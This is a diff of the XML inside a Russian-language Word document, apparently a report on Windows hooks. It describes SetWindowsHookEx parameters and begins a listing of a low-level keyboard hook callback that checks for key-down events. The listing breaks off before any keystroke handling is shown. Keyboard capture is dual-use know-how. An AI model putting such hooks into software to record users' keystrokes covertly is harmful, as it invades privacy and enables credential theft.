-        <w:t>[in] Дескриптор DLL, содержащий процедуры фильтра (hook), на которую указывает параметр lpfn.  параметр hMod должен быть установлен в ПУСТО (NULL), если  параметр dwThreadId устанавливает поток, созданный текущим процессом, и если процедура фильтра (hook) находится внутри кода, связанного с текущим процессом.</w:t>
+        <w:t xml:space="preserve">dwThreadId </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Устанавливает идентификатор потока с которым, процедура фильтра (hook) должна быть связана. Если этот параметр равняется нулю, процедура фильтра (hook) связывается со всеми существующими потоками, запущенными на том же самом рабочем столе, что и вызывающий поток.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>5.2 Низкоуровневый хук</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LRESULT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CALLB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ACK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LowLevelKeyboardHook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nCode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WPARAM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LPARAM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>истема</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>вызывает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>эту</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>функцию</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>каждый</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>раз</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>когда</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>собирается</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>вставить</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>новое</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>событие</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ввода</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>клавиатуры</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>очередь</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ввода</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>данных</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>потока</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Ввод с клавиатуры может исходить от локального драйвера клавиатуры или от вызовов функции keybd_event.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -3143,26 +3785,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">dwThreadId </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[in] Устанавливает идентификатор потока с которым, процедура фильтра (hook) должна быть связана. Если этот параметр равняется нулю, процедура фильтра (hook) связывается со всеми существующими потоками, запущенными на том же самом рабочем столе, что и вызывающий поток.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">wParam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Устанавливает идентификатор сообщения клавиатуры.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3181,187 +3812,15 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>LRESULT</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>CALLB</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ACK</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LowLevelKeyboardProc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>int</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nCode</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WPARAM</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wParam</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LPARAM</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>lParam</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>с</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>истема вызывает эту функцию каждый раз, когда собирается вставить новое событие ввода с клавиатуры в очередь ввода данных потока. Ввод с клавиатуры может исходить от локального драйвера клавиатуры или от вызовов функции keybd_event.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="2355"/>
-        </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">wParam </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[in] Устанавливает идентификатор сообщения клавиатуры.</w:t>
+        </w:rPr>
+        <w:t xml:space="preserve">lParam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Указатель на структуру KBDLLHOOKSTRUCT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3370,26 +3829,65 @@
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
         <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">lParam </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[in] Указатель на структуру KBDLLHOOKSTRUCT.</w:t>
+        <w:ind w:left="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5.2.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Листинг</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>функции</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LowLevelKeyboardHook</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3397,52 +3895,22 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Листинг</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>функции</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LowLevelKeyboardHook</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LRESULT CALLBACK LowLevelKeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3450,24 +3918,22 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LRESULT CALLBACK LowLevelKeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>{</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3475,24 +3941,23 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>{</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetKeyState(NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3500,25 +3965,23 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>GetKeyState(NULL);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (nCode == HC_ACTION &amp;&amp; (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3526,25 +3989,23 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>if (nCode == HC_ACTION &amp;&amp; (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3552,25 +4013,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
